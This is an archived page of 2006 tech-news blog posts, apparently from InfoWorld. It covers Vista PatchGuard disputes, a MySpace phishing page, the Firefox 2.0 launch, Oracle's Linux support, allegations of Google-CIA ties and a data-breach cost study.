- Google accused of CIA ties
- Google to MS: Let users choose
- Sony's woes continue with PS3 delay
- FCC 811 mandate: Pandora's box?
- AJAX vendor joins Eclipse
- Politicians just don't get IT
- More chairs fly over PatchGuard
- MySpace used in phishing attack
- Report: News Corp. eyeing Digg
- Oracle-Ubuntu rumor fizzles
October 31, 2006 | Comments: (0)
Robert David Steele, a former clandestine services case officer for the CIA, has accused search behemoth Google of being in bed with the intelligence agency and government departments. Steele aired these views on Alex Jones's nationally syndicated radio show, according to reports.
"I think that Google has made a very important strategic mistake in dealing with the secret elements of the U.S. government -- that is a huge mistake and I'm hoping they'll work their way out of it and basically cut that relationship off," Steele said, claiming to have confirmed his allegation with his ties in the CIA.
He also said that "Google was a little hypocritical when they were refusing to honor a Department of Justice request for information because they were heavily in bed with the Central Intelligence Agency, the office of research and development."
An MP3 recording of the Steele interview is available to Prison Planet.tv subscribers.
In addition to working for the CIA, Steele is a former Marine Corps infantry and intelligence officer for twenty years and was the second-ranking civilian in U.S. Marine Corps Intelligence from 1988 to 1992. He's also the founder and CEO of OSS.Net, an organization committed to furthering international understanding of the importance of open source intelligence.
This isn't the first time Steele, or anyone else for that matter, has suggested ties between Google and the government. A Web site called HSToday.us reported in January:
"Google's alleged secret relationship with the U.S. intelligence community (IC) was divulged by an IT contractor and confirmed by U.S. intelligence authorities familiar with the matter during the OSS.Net IOP conference near Washington, DC. The contractor, who spoke on a not-for-attribution basis, said that at least one U.S. intelligence agency he declined to identify is working to 'leverage Google's [user] data monitoring' capability as part of an effort by the IC to glean from this data information of 'national security intelligence interest' in the war on terror."
Of course, none of these allegations have yet to be proven, and the fact that the aforementioned report came from an unnamed source at a conference sponsored by Steele's own company adds a few grains of salt to the story.
Still, given the power Google wields with its data-mining abilities, it's interesting -- and perhaps unsettling -- to contemplate the implications of ties with intelligence organizations.
What do you think? Is this simply baseless fodder for conspiracy theorists, or something that warrants deeper investigation?
Posted by Ted Samson on October 31, 2006 02:29 PM
October 30, 2006 | Comments: (0)
Google to MS: Let users choose
McAfee and Symantec aren't the only companies asking Microsoft to play fair with its forthcoming Vista OS. Searchasaurus Google today urged Big Red to ensure that with its future products, users can easily choose among search tools and apps.
This request was made in Belgium by David C. Drummond, senior vice president of corporate development at Google, according to reports, after a meeting with antitrust regulators for the European Union. "It's been our view that any new version of Microsoft products that include search, that that be done in a way that preserves user choice for search and other applications," Drummond said, according to the Associated Press.
Microsoft, which has been hankering for a piece of the profitable search market, has been pushing its Live search engine.
The EU expressed competition concerns to Microsoft in a letter last March, citing the company's "plans to bundle in an Internet search function, a digital rights management program and software for creating fixed document format comparable to PDF, and security features," the IDG News Service reported.
"We are concerned about the possibility that Vista will include software elements which are available separately -- either sold by Microsoft or by other software companies," commission spokesman Jonathan Todd said then.
Todd added last March, "There is also the possibility that we won't have all the technical information needed for competitors to make their software interoperable with Vista."
The latter sentiment was rather prophetic, as McAfee and Symantec, along with other security ISVs, have cried foul that Microsoft hasn't given them what they need to ensure their security wares run correctly on Vista.
Microsoft continues to deny any wrongdoing.
As for Google, the company spokesman said that it's too early to tell whether it has cause yet to make antitrust allegations.
Posted by Ted Samson on October 30, 2006 05:16 PM
October 30, 2006 | Comments: (0)
Sony's woes continue with PS3 delay
Poor Sony. Last week, it detailed the problems behind the millions of defective, prone-to-combustion laptop batteries it's recalled, which is costing the company $429 million.
Now today, according to reports, it's going to be shipping 20,000 fewer PlayStation 3 video-game units than it had originally announced, due to a delay in part production.
That delay won't affect shipments in the U.S., which is slated to get 400,000, as opposed to the 80,000 units now scheduled to drop in Japan.
Notably, the company is already planning to sell the units at a loss, with the 20GB model priced at $430. That's not an uncommon practice for game-system vendors, though, who make up the loss through software and licensing sales.
Sony is currently running at a 94% profit loss this quarter, due to the battery recalls and troubles in its gaming division.
By the way, if you think discussing video-game consoles is too end-user-y for an enterprise IT blog, well, you may be right.
But then again, have you seen the specs on the high-end system? In addition to having Blu-Ray optical drive and built-in 802.11 b/g Wi-Fi, it will be the first commercial device powered by the Cell processor, a 3.2GHz chip that Sony developed with assistance from IBM and Toshiba. Boasting seven SPEs, the chip is said to perform at 218 gigaflops. Maybe there'll be a place for one in your server room?
Posted by Ted Samson on October 30, 2006 02:35 PM
October 30, 2006 | Comments: (0)
FCC 811 mandate: Pandora's box?
Pursuant to the Pipeline Safety Act of 2002, the FCC has mandated that all telecommunications network carriers make available by March 2007 811 as a free dial in phone number for digging site information.
Some states and cities already have their own service, but this will be the first time it goes national. Vonage will be the first provider to offer 811 as a national service.
In case you've never heard of this before, here's how it works: If you are adding an addition to your home, installing a pool or just digging a ditch in your backyard, you dial 811 and that connects you to what is called a local one call center.
The center in turn connects to the local utility company in the area and lays out the location of pipes and or cables underground.
It is nice to know that my neighbor won't be cutting any power lines that turn off my air-conditioning in August or worse still hitting a gas pipeline.
But, what if my neighbor is a local terrorist? Then what? You never know what he might do with that info. In fact, he never says good morning to me, shouldn't that tell me something?
Now he is armed with information some governments actually try to keep secret.
It is a crazy world we live in an having to worry about these things just makes it crazier still.
Posted by Ephraim Schwartz on October 30, 2006 01:16 PM
October 30, 2006 | Comments: (0)
AJAX (Asynchronous JavaScript and XML) tools vendor Helmi Technologies has joined the Eclipse Foundation as an Add-In Provider member.
Maker of the Open Source RIA Platform, Helmi is making its technology and source code available to the Eclipse community.
"We are excited to be joining the Eclipse Foundation," said Jorden Woods, CEO of Helmi Technologies in the U.S., in a statement released by the company. "Our goal when developing our open source product was to allow companies to leverage their development team's knowledge base and shorten the learning curve to maximize productivity. We share the same vision as the Eclipse Foundation. which is to enable developers to easily create derivative works from our platform in an open source environment."
The Helmi platform, positioned for Web 2.0 deployments, is available for download here.
Add-In Provider members are companies that view Eclipse as an important part of their corporate and product strategy, Eclipse said. These members want to participate in the development of the Eclipse ecosystem.
Posted by Paul Krill on October 30, 2006 12:29 PM
October 27, 2006 | Comments: (0)
Earlier this week, the president of the United States (George W. Bush) sat down with a reporter from CNBC for a friendly interview. During the chat, the reporter asked him about his Internet usage. "Have you ever Googled anybody? Do you ever use Google?" she wanted to know.
The president replied that he does use "the Google" (his words) on occasion to "pull up maps" -- "I forgot the name of the program, but you get the satellite ..." -- for viewing his ranch.
This exchange has prompted chuckles among techies and non- across the Internets -- another famous reference by Bush from 2004. (More troubling to me in that CNBC interview is Bush's admission that he will not use e-mail: "I don't e-mail, because of the different record requests that can happen to a president.")
But Bush isn't the only elected leader out there who has demonstrated a poor grasp of fairly basic technology -- and worse. As such, I think these kinds of gaffes ought to elicit more than dismissive snickers or disgusted eye rolls. They should elicit feelings of concern and some probing questions of both candidates and politicians about how technology fits in to their agendas, including how they are going to work to protect our exposed digital borders.
Now, I'm not saying that elected leaders need to be DBAs or certified Linux admins anymore than a CEO of a private organization should be. They should, however, have a decent understanding of and interest in topics such as e-commerce and data security, as well as advisers and staffers who are keenly attuned to technological issues. This is, after all, the Internet Age, and the Internet is an essential tool for our economy and security -- which makes the Internet a plausible place for attacks in the U.S.
Examples and reports of political techno-ignorance seem to be on the rise, and I don't think people in the tech community needed to be told that by a former EU commissioner.
The most significant proof, in my mind, is a recent report from the Government Reform Committee which gave the federal government a pathetic D+ for its handling of data security. Seems that since 2003, every single one of the governments 19 departments has suffered at least one data breach, though some have suffered hundreds. If there's been a call for sweeping reform throughout these departments, I've yet to read about it.
Then there were the hearings earlier this year about Net neutrality. The outcome of that debate could have a huge impact on the Internet as we know it, but I can't help but wonder how many of our elected officials really grasp the issue. Consider, for example, the infamous description of the Internet by Sen. Ted Stevens:
"Ten movies streaming across that, that internet, and what happens to your own personal internet? I just the other day got ... an internet was sent by my staff at 10 o'clock in the morning on Friday, I got it yesterday. Why? [...] They want to deliver vast amounts of information over the Internet. And again, the Internet is not something you just dump something on. It's not a big truck. It's a series of tubes. And if you don't understand those tubes can be filled and if they are filled, when you put your message in, it gets in line and it's going to be delayed by anyone that puts into that tube enormous amounts of material, enormous amounts of material."
Consider, also, electronic voting. Experts have cited legitimate security problems with existing e-voting machines for years now. Yet even after over a thousand separate incidences were reported during the 2004 elections, the government's moving at a glacial pace to resolve them.
At least one pundit has even resorted to giving an in-depth explanation of how to steal an election, which, alongside an undoubtedly satirical Web site promising to fix election outcomes, might light a fire under a politician or two to fix the problem.
And just today, Rep. Edward Markey called for the arrest of security researcher Christopher Soghoian, who created a Web site, called Northwest Airlines Boarding Pass Generator, on which users could print up a forged boarding pass for Northwest Airlines flights. That, to me, is yet again indicative of a politician who is missing entirely the big technology picture of airline security. (There's also a question there about freedom of speech, but this entry is more about politician's knowledge of technology, not Constitutional law.)
Anyway, election day is drawing near, so if you haven't voted yet and you're as concerned as I am about keep technologically ignorant politicians out of office, I suggest you do a little more homework on your candidate of choice.
Perhaps even send him or her an e-mail -- though if you do, you run the risk of not getting a response. Because, you know, not all politicians read their e-mail.
Posted by Ted Samson on October 27, 2006 05:26 PM
October 27, 2006 | Comments: (0)
More chairs fly over PatchGuard
TechWatch blogged about the three ring circus called "Vista PatchGuard" that popped up in the middle of the once staid security market in recent months. As I'm sure you know, vendors like Symantec and McAfee are none too happy about Microsoft's kernel protection technology for 64 bit Windows Vista systems, claiming that it will prevent them from taking the steps necessary to detect and protect users from threats like rootkits. Microsoft has always said that it will work with third party vendors to extend the Vista kernel and enable alternative types of protections through APIs and other fixes, providing that PatchGuard remains in place. But with Gartner estimating that those kinds of extensions will take years to complete, security vendors aren't anxious to wait around while Microsoft polishes its security lineup.
This week saw security vendor and Microsoft partner Authentium jump ship, announcing on Wednesday that a new technology the company will announce next month, VirtualATM, will allow them to circumvent PatchGuard and "hook" the Vista Kernel so that they can secure online banking transactions from Trojans, keyloggers and other types of malware.
The company toned down its language yesterday, with a new post that claims VirtualATM just adds a "complimentary" layer of security to PatchGuard, but doesn't subvert it. Authentium implores Microsoft not to "go it alone."
According to published reports, Microsoft plans to patch PatchGuard to prevent the VirtualATM hack, just as it patched Vista to prevent the "Blue Pill" hypervisor hack demonstrated by Joanna Rutkowsky at the Black Hat briefings conference. But with two PatchGuard patches out before Vista even hits the street, and hackers estimating that PatchGuard hacks will be available within months or a year of Vista's public release, the whole argument for the technology -- that it would make the kernel off limits to malicious code -- seems to be turning into so much sand.
With blood in the water, even small fry are taking their licks at PatchGuard. Firewall vendor Agnitum is talking smack about PatchGuard today in their blog, and has referred to PatchGuard as Microsoft's Maginot line. Not that the opinions of Agnitum count for much in the hallways of Redmond, but the allusion to France's ill-fated series of static fortresses along the border with Germany that Hitler's army easily circumvented in its invasion of the country. More than one security researcher has already admitted that, whatever its benefits, PatchGuard won't be hack proof. Monumental security "fixes" like PatchGuard and the Maginot line only work for as long as it takes for some smart hacker to figure out a way around them, at which point they become a monument to fighting yesterday's battles.
Posted by Paul Roberts on October 27, 2006 01:10 PM
October 27, 2006 | Comments: (0)
MySpace used in phishing attack
A report from Netcraft today points to a phishing Web site that is being hosted on MySpace.com. The page, which is still active, asks users to provide their MySpace username and password to access premium content. Hitting Login, however, sends your credentials to a server hosted in Ireland that Netcraft has identified as being involved in phishing attacks.
The attack is noteable because it does not use suspect techniques like cross site scripting to fool users. Instead, plain old HTML is used to bury the MySpace.com content on the page and provide the simple login screen for users. That means that automated tools that Myspace uses to look for malicious content may not clue into the ruse.
While MySpace profiles wont yield credit card numbers and bank accounts, and aren't the treasure troves that, say, online brokerage accounts are, they can be used to spread malicious code or to craft even more sophisticated spear phishing attacks later on.
MySpace has been informed of the attack but apparently hasn't gotten around to taking it down yet. Let's hope they do soon!
Posted by Paul Roberts on October 27, 2006 11:21 AM
October 26, 2006 | Comments: (0)
Report: News Corp. eyeing Digg
News aggregation site Digg.com and News Corp. have been in engaged in acquisition negotiations but have yet to reach any agreements, according to Techcrunch.
By acquiring Digg, News Corp. would add another Internet hot-spot to its portfolio, which already includes MySpace. If the acquisition doesn't occur, Digg is poised to persue a secound round of financing, according to the report.
The sticking point, Techcrunch says, is how much Digg is actually worth: The startup is asking for no less than $150 million, which doesn't equal the company's ad revenue, some speculate. (Doesn't hurt to ask, right? YouTube's owners got $1.6 billion from Google for their video-sharing site.)
Digg's value is undoubtedly tied to the number of visitors it gets, and that was one of the looming questions in the negotiations. Digg pegs unique monthly visitors at 20 million and growing. Comscore re-ports that site enjoys only 1.3 million monthly unique visitors. Quantcast, currently in beta, cal-culates the number of U.S. visitors at around 500,000 (if I am reading their chart correctly).
Stay tuned.
Posted by Ted Samson on October 26, 2006 01:00 PM
October 25, 2006 | Comments: (0)
Rumors of some sort of Linux distribution arrangement between Oracle and Ubuntu have proven to be just that: rumors.
Such an announcement had been widely anticipated at the Oracle OpenWorld conference in San Francisco this week.
"We've never talked to Ubuntu," said Edward Screven, chief corporate architect for Oracle, during a press conference at OpenWorld on Wednesday afternoon. Instead, Oracle announced plans to support Red Hat Linux, cutting onto Red Hat's turf.
But some were seeking even more. At one point during the press conference, one questioner noted the existence of free, open source databases like MySQL and, while beginning to ask when Oracle would offer such as a database, was quickly cut off.
"The only thing we're announcing today is support for Linux," Screven said. The company also will not disclose source code for its own products.
"This is something our customers have asked us to do for quite a while," said Bob Wynne, Oracle vice president of corporate communications, of Wednesday's Linux announcement.
Screven said the adoption of Linux in the enterprise has been too slow and that Oracle's move was a natural extension of progress for Linux and the use of Linux on commodity hardware.
Still, Screven acknowledged Oracle's Linux revenue streams have not amounted to much, relatively speaking. "The amount of revenue in the Linux business compared to all our other businesses is small but the strategic importance is large," he said.
Posted by Paul Krill on October 25, 2006 04:29 PM
October 25, 2006 | Comments: (0)
Oracle move a worry for Red Hat
Don't call it Oracle Linux! The database vendor won't be packaging its own distribution of the open source OS, but Oracle CEO Larry Ellison announced at Oracle OpenWorld this afternoon that his company will be offering full support for Linux under a new "Unbreakable Linux" campaign.
Oracle has offered comprehensive support for customers who run Oracle databases on Linux in the past, but the new program is something more. According to Ellison, customers will now be able to receive all their patches, security fixes, and backports for RHEL (Red Hat Enterprise Linux) releases 3 and 4 directly from Oracle. In addition, Oracle will offer its Linux support customers full indemnification from intellectual property lawsuits, like the ones filed by SCO.
Red Hat insists that it maintains a longstanding and successful relationship with Oracle. Remember, though, that although Red Hat does package its own complete distribution of Linux, it doesn't actually sell the OS. Rather, its business model is based on subscription support services. As a result, this new move puts Oracle in direct competition with the Linux vendor -- and, as anyone in the software industry can tell you, Oracle is a formidable competitor.
InfoWorld's resident open source blogger, Matt Asay, was in attendance at the show and has posted screen caps of Ellison's slides, complete with pricing.
It will be interesting to see how this pans out as the shockwaves reverberate across the Linux industry.
Is Red Hat in trouble? Have your say below.
Posted by Neil McAllister on October 25, 2006 03:24 PM
October 24, 2006 | Comments: (0)
Authentium: Vista kernel cracked
updated | Some security ISVs such as McAfee and Symantec have been fighting for Microsoft to give them access to 64-bit Vista's kernel so the OS won't reject their security wares.
Security vendor Authentium is taking a different approach: It's found a way to simply bypass PatchGuard, the mechanism intended to prevent software from accessing the Vista kernel, according to reports.
Authentium's CTO Helmuth Feericks told Reuters last week that his company "had figured out a way to turn off PatchGuard protection, install its own software, and then turn it back on."
That technology has made its way into Authentium's ESP Enterprise Platform, according to PC Magazine. ESP includes virus protection, antispyware, data recovery, personal firewall, parental controls, popup blocker, and transaction security modules.
An Authentium Virus Blog entry written Oct. 20 says the following:
"The promises Microsoft has made about PatchGuard do not solve any problems for us and by the time they deliver will not be of any use to us. This is assuming that if they deliver something to help anybody, it will actually be something useable. It will allow an unfair advantage to Microsoft when competing with the security vendors as they can and will most likely bypass Patchguard for their own products and will not allow their competition to do the same."
(The entry doesn't mention Athentium's claim that it has bypassed PatchGuard, but it does refer to a non-disclosure agreement with Microsoft. Presumably, said NDA has expired, been broken, or else there's more to be revealed.)
If Authentium's claims are to be believed, it's not a good sign for Redmond, which has gone to great lengths to tout Vista's security in the hopes of putting Windows's tainted security record behind it. If the company has managed to tiptoe around PatchGuard so soon, clever hackers should be able to as well.
In fact, according to a recent entry in Symantec's Security Response Weblog by Oliver Friedrichs, director of emerging technologies in Symantec Security Response: "... [H]ackers have already broken PatchGuard and can disable it. This means that hackers can already get malicious code into the Windows Vista kernel; while legitimate security vendors can no longer protect it. This presents a serious new risk for consumers and enterprises worldwide."
Friedrichs goes on to say, "... [I]f hackers can bypass PatchGuard, why don't security vendors? We certainly could, if we chose to; however, Microsoft has firmly stated that any attempt to do so will result in an update to PatchGuard, which will detect these attempts. It would be foolish for Symantec to ship a product out to over 200 million desktops that may result in a BSOD on each desktop, if Microsoft decides to update PatchGuard."
Posted by Ted Samson on October 24, 2006 09:46 PM
October 24, 2006 | Comments: (0)
Mozilla: Party for people, not browser
With parties planned in places from the Maldives to Paris to celebrate the official release of Firefox 2.0, Mozilla community coordinator Asa Dotzler said Tuesday Firefox was more than a browser -- it's a movement.
Dotzler's job is to keep the Fire in Fox stoked, and reaching 2.0 is reason for a global party, he says. Launch parties are scheduled roughly for Oct 27 and located via Google Maps at the firefoxparty.com site.
You might ask, what does a crop circle, space balloon, sidewalk chalk and a NY Times ad have in common? They highlight the long lists of wacky events Firefox fans have organized to celebrate major milestones for the Firefox browser. To celebrate the release of Firefox 2, Firefox fans are being equipped with the tools to plan launch parties around the globe... There are currently over 375 parties playing host to approximately 3300 Firefox fans who will be celebrating the launch of Firefox 2 this week. Enthusiasts as far south as Antarctica and as far north as Norway have registered thus far and the attendee list is still growing. You can check out a map detailing the party locations in real-time at the Web site.
But aren't we talking about a Web browser, after all? How does a browser stir so much interest for people to contribute? Dotzler said as many as 20,000 people signed up to test 2.0, and that Firefox was spreading at nearly 350,000 downloads a day with little traditional advertising.
It doesn't hurt that bigger groups are getting cool swag like T-shirts and messenger bags to celebrate, but the bottom line with the movement: "Everyone wants to be part of a club," Dotzler said.
But this club would not be the place to be if the movement was not producing "something good", he said. "[The Firefox development team] is the most experienced group of browser developers in the world."
And with open source being just that, their hard work is giving life to next-generation browsers such as Flock, which is based on Firefox.
The co-founder and chief strategy officer of the social browser Flock, Geoffrey Arone, said its upcoming 1.0 release was being built on Firefox 2.0 and would be ready in December.
Arone says Firefox 2.0 is a just a starting point, and Flock -- aimed at "the Web's evolution from a passive to a fluid, participatory medium" -- is just a "better browser".
While the Firefox team pores over code and nails the development, and has released some solid refinements to the interface, Arone said, Flock pores over what people do on the Web in their browser to make it more about "... the change in Web user behavior and experience from just 'looking' at the Web to 'making' the Web".
He said it's not as if people are not already sharing photos via e-mail and blogging to share thoughts, but Flock will just make it easier and seamless to find and share while browsing. "It's the actual interplay of things," he said.
The latest batch of usability research: University of California students.
And one of the main feature for Firefox 3.0, as outlined by Dotzler, is coming to Flock in 1.0 -- searchable history. No more trawling day by day through history to find that URL. Each page is indexed and searchable, much like in Mac OS's Spotlight.
Sounds very promising, and one more benefit of open source for development -- a little variety.
But if it's IE7 vs. Firefox 2.0 for you, take a look at sister publication PC World's in-depth comparison.
Do you welcome the return of the Browser Wars? I do. Talk back to us below.
Posted by Mike Barton on October 24, 2006 03:40 PM
October 24, 2006 | Comments: (0)
OASIS approves SOA reference model
OASIS this week announced its approval of its Reference Model for Service Oriented Architecture (SOA-RM) 1.0 as an OASIS Standard.
SOA-RM provides an abstract framework for understanding the significant entities and relationships within a SOA, OASIS said.
The standard enables development of specific reference or concrete architectures using consistent standards. But SOA-RM is not tied any specific Web services standards, technologies or other implementation details; it instead offers common semantics for use across and between implementations.
OASIS officials released prepared statements pertaining to the standard.
"The approval of the SOA reference model is a significant step forward in enabling increased SOA interoperability and service re-use within and between organizations that adopt SOA," said William Barnhill, associate at Booz Allen Hamilton and a member of the OASIS Technical Advisory Board.
"There are many different definitions of SOA being used in the marketplace today," said Duane Nickull of Adobe Systems, chair of the OASIS SOA-RM Technical Committee. "By providing a clear, singular point of reference, the SOA-RM enables even those with unique ideas about SOA to describe their work in quantifiable terms that can be commonly understood."
"SOA-RM offers us a much-needed vocabulary for communicating an organization's services architecture. It delivers a standard reference that will remain relevant as a powerful model, useful across SOA deployments with evolving technologies," said Patrick Gannon, president and CEO of OASIS.
Posted by Paul Krill on October 24, 2006 01:49 PM
October 24, 2006 | Comments: (0)
Motorola on Wi-Fi: Stay the course
It seems Motorola didn't much care for my recent blog quoting a Motorola executive on the future of WiMAX and Wi-Fi.
They gave me a call and said I had it all wrong. Being the fair-minded individual that I am I herewith relate some of their comments.
Mind you, Motorola representatives never said I was wrong. I couldn't be wrong because it came from one of their executives and I didn't make it up.
Nevertheless, if President Bush can re-explain what he meant by "stay the course," I guess it is only right that Motorola can re-explain what Juan Santiago said when he told me there is no business case for Metro Wi-Fi,Wi-Fi belongs only in the home and that Wi-Fi and WiMAX don't mix, i.e., they interfere with one another.
If you want to read more on WiMAX and Motorola see today's column.
Tom Hulsebosch, senior director of product management for the Wireless Broadband Network at Motorola told me that Motorola supports numerous wireless networks including WiMAX, Wi-FI, and a proprietary "pre-WiMaX" solution called Canopy. We believe all of these solutions have an integral place in the market place he said and added,
"Metro Wi-Fi is near and dear to Motorola. We helped create that space."
I'm not sure, is that like Gore saying he invented the Internet?
But I've interviewed Marty Cooper enough times to know that Motorola is actually credited with inventing the cell phone under then employee Cooper.
Motorola is playing a key role in deploying Metro Wi-Fi in at least a dozen cities, delivering the entire access network, not only the access points but the backhaul that feeds the capacity into Motorola's mesh networks, said Hulsebosch.
Cities include Philly, Anaheim, Milpitas, New Orleans, San Francisco.
Hulsebosch refutes Santiago's claim that there is no business case for Metro Wi-Fi and that it must be subsidized in order to succeed.
Rather he says, "in any city with 2,000 homes per square mile the Metro Wi-Fi business case it is very attractive."
Finally, Hulsebosch says Wi-Fi and WiMAX only interfere with one another if they exist in the same chip set as Intel is trying to do.
Rather if they are two separate radios the problem goes away. But he also added two radios works fine in a desktop but in a cell phone "it is a little trickier."
So why the disconnect between Santiago and Hulsebosch? Let's chalk it up to enthusiasm.
Does it mean Motorola will at some point abandon Wi-Fi?
I think they believe WiMAX will replace Wi-Fi at some future point. Santiago just let the cat out of the bag a little too soon.
Posted by Ephraim Schwartz on October 24, 2006 11:08 AM
October 23, 2006 | Comments: (0)
Firefox 2.0 released a day early
updated | Mozilla has now officially released Firefox 2.0 following the company's backdoor release a day early.
Mozilla confirmed to me Tuesday that this post's original link (above) was to the actual final version, after saying yesterday: "Mozilla does not guarantee that any set of files currently found within its Web site or elsewhere will be the final release."
The chief concern with pointing directly to the download was that someone hosting the mirror may get stung with excess bandwidth charges, highlighting Mozilla's grassroots methods.
Well, at least no one was stung with malware. With Microsoft's release of IE7 last week, a Trojan-loaded site spoofed the release a day early.
I spoke with Mozilla today about is global launch party, and Flock about its "better browser" and will post on this separately...
You might ask, what does a crop circle, space balloon, sidewalk chalk and a NY Times ad have in common? They highlight the long lists of wacky events Firefox fans have organized to celebrate major milestones for the Firefox browser. To celebrate the release of Firefox 2, Firefox fans are being equipped with the tools to plan launch parties around the globe at www.firefoxparty.com. There are currently over 375 parties playing host to approximately 3300 Firefox fans who will be celebrating the launch of Firefox 2 this week. Enthusiasts as far south as Antarctica and as far north as Norway have registered thus far and the attendee list is still growing. You can check out a map detailing the party locations in real-time at the Web site.
But InfoWorld's Kevin Railsback ferreted out the back-door soft-launch to get the party started.
Not to be mistaken for the usual weight put on a 2.0 such as Web 2.0, this latest version of Firefox adds some handy features, but don't expect anything earth shattering.
The real message here with Firefox 2.0 coming out just days after Microsoft released IE7 is that the browser wars seem back on, which hopefully means some new features will add some genuinely new life to browsers.
A day early? Hopefully Mozilla dotted its Is and crossed its Ts, to avoid the bad news Microsoft got when holes were thought to have been found in IE7 within 24 hours of its release.
Microsoft says the bug is not in the browser but Outlook Express, its e-mail client. Finer points...
Back to the state of browsers: OK, so IE7 now has tabs -- finally. And Firefox has added a nifty new feature that recovers pages and data from the browser following a crash.
A PR guy for the social web browser firm Flock e-mailed to point out how the two leaders are "really about incremental changes to an outdated model." He said browsers had been stagnant for 10 years.
Flock's focus: "The Web's evolution from a passive to a fluid, participatory medium ... [Marking] the change in Web user behavior and experience -- from just 'looking' at the Web to 'making' the Web."
Very true, and little is reflected in IE7 or Firefox 2.0, but I will update after talking through some of this with Mozilla tomorrow, so check back then.
If you have questions for the Mozilla or IE teams, leave them with us below and we'll see if we can get an answers or roadmaps. I'll also set up a chat with Flock so they can have their say as to why their browser is it.
Posted by Mike Barton on October 23, 2006 03:48 PM
October 23, 2006 | Comments: (0)
MS bringing Ruby expert aboard
Microsoft has hired John Lam, developer of the RubyCLR, as a member of its .Net Developer Platform Team. He will join the company in January 2007, according to a blog by Microsoft executive S. "Soma" Somaseger.
RubyCLR bridges Ruby and .Net. Lam will be a program manager in the CLR team, focused on implementing dynamic languages on .Net.
"I've decided to stage a friendly takeover of Microsoft. As of January, 2007 my new work address will be Building 42 at Microsoft. I'll be working in the CLR team to help bring the love of dynamic languages out to the statically typed heathens," Lam said in his own blog.
Posted by Paul Krill on October 23, 2006 09:36 AM
October 23, 2006 | Comments: (0)
Antivirus vendors splitting over Vista
We've heard a lot from big name consumer antivirus vendors Symantec and McAfee in recent weeks about their concerns over Microsoft's PatchGuard technology, but less from smaller antivirus firms like ESET, Sophos, Kaspersky Labs, and Trend Micro. Now one of those vendors are coming off the fence and, surprisingly, not coming to the aid of its compatriots.
UK-based Sophos issued a statement early Monday in support of Microsoft's PatchGuard feature, which McAfee and Symantec have both cried foul over.
In an e-mail statment released Monday, Sophos said that it's products will offer complete threat protection on 64 bit systems even without the kind of kernel level access Symantec and McAfee are arguing over.
"Sophos is experiencing no problems with PatchGuard for Sophos's latest HIPS technology. Sophos Anti-Virus and its built-in HIPS will work just fine on both 32- and 64-bit versions of Windows Vista. Microsoft has so far provided all the interfaces that Sophos needs for providing this pre-execution HIPS as well as runtime HIPS," the company said.
Symantec and McAfee may be singing a different tune because "they haven't coded their solutions with 64-bit Vista in mind," said Richard Jacobs, CTO of Sophos.
"We've taken a different approach to HIPS, by focusing more on catching bad behaviour by analyzing code before it executes. Additionally, we are building our technology by making use of supported Microsoft interfaces rather than by trying to subvert the kernel by 'hooking' calls to it. That's why we're ready for 64-bit Vista, and others aren't," Jacob's is quoted saying.
However, while its giving Microsoft the benefit of the doubt on PatchGuard, the feature does put the onus on Redmond to make good on promises to work with AV vendors to create kernel interfaces to the Vista kernel that will support new security features.
"It's clearly the case that we and other vendors will now have some dependency on Microsoft to deliver kernel interfaces for new security innovations, which could slow us all down. However this is more than compensated for by the additional security offered by a locked down kernel," Jacobs said.
Microsoft received a similar endorsement last week from security researcher and Blue Pill rootkit author Joanna Rutkowska, who said that PatchGuard was "a very good idea," though she debated whether it could really be considered a security feature, so much as a way to force legitimate vendors to interact with the kernel in an appropriate and predictable way. If PatchGuard couldn't prevent kernel hooking, it would at least make it easier to spot malicious programs that are trying to do it, said Rutkowska.
Of course, Sophos going on record supporting PatchGuard is nothing new. Company executives like Graham Cluley have been quoted extensively in press coverage of the debate saying that they don't share McAfee and Symantec's criticisms of Microsoft, and that they've found Redmond responsive to requests to work on extending the Vista 64 bit kernel to meet their needs.
How much of this is real and how much is gamesmanship? It's hard to say. McAfee and Symantec are clearly protecting their turf, especially in the consumer space, and appear to be building a case for some kind of antitrust action over the security features in Vista. On the other hand, it's entirely possible that Microsoft is presenting two faces to the antivirus vendors: one to small enterprise-focused vendors like Sophos and Trend, who don't pose a threat to OneCare and Microsoft's other products, and another to Symantec and McAfee who do.
It's impossible to know, for sure, whether the antivirus vendors are crying wolf, or whether Microsoft is truly acting volpine as it ramps up its security products. Once the lawsuits start flying, we may learn more.
Posted by Paul Roberts on October 23, 2006 07:05 AM
October 20, 2006 | Comments: (0)
Study: Data-breach costs on the rise
Data breaches are on the rise in the business world. According to the Privacy Rights Clearinghouse, more than 330 data loss incidents involving more than 93 million individual records have occurred since February 2005.
As these incidents increase in number, so too do the associated expenses that companies end up paying for their negligence.
Data breaches have cost companies an average total of $4.7 million, or $182 per compromised record, in 2006, according the "2006 Cost of Data Breach Study" from Ponemon Institute. That's up from $138 per record last year.
Among the 31 companies that participated in the study, all of which suffered data security breaches, total costs per incident ranged from under $226,000 to over $22 million.
"The burden companies must bear as a result of a data breach are significant, making a strong case for more strategic investments in preventative measures such as encryption and data loss prevention," said Dr. Larry Ponemon, chairman and founder of The Ponemon Institute, in a written statement. "Tough laws and intense public scrutiny mean the consequences of poor security are steep - and growing steeper for companies entrusted with managing stores of consumer data."
The report, slated for release on Monday, Sept. 23 at Infosecurity NY 2006, was co-sponsored by PGP, an enterprise data security and encryption provider, and Vontu, the data-loss prevention solutions vendor. (Notice a common thread between Ponemon's recommendation and the companies sponsoring the report? Still, I wouldn't discount these findings outright.)
About 70% of the costs per incident were "indirect," stemming from loss of existing and future customers, according to the report. Not surprisingly, people don't want to stick around after you've made them a target for identity theft.
The report breaks down the direct costs by various activities. Detection, discovery and escalation expenses, i.e. "activities necessary to discover and report the breach to appropriate personnel in a specified time period", averaged $295,475.
Notification costs, referring to the process of alerting "data subjects with a letter, outbound telephone call, e-mail or general notice, averaged $662,269.
Ex-post responses, the process of helping victims with information, recommendations, credit-report monitoring, or reissuing a new account or credit card, cost an average of $1,245,845.
What was to blame for these breaches?
- Fourteen of them (45%) were a result of lost or stolen laptops, desktops, PDAs, or thumb drives.
- In nine cases (29%) of the incidents, the cause was lost or stolen files acquired or used by a third-party.
- In eight cases (26%), lost or stolen electronic backups (e.g. magnetic tapes) led to the data spill.
- In four (13%) cases, the cause was lost or stolen paper records or files.
- Three cases (10%) involved hacked electronic systems.
- Malicious insiders were behind two cases (6%).
- Malware was the culprit in two cases (6%).
- In one case (3%), a misplaced network or enterprise storage device (due to a natural disaster) led to the breach.
Participants were also asked preventive measures they implemented after the breach. Their responses:
- Thirteen (42%) have added additional manual procedures or controls.
- Nine (29%) have implemented training and awareness programs.
- Seven (23%) are encrypting data in motion.
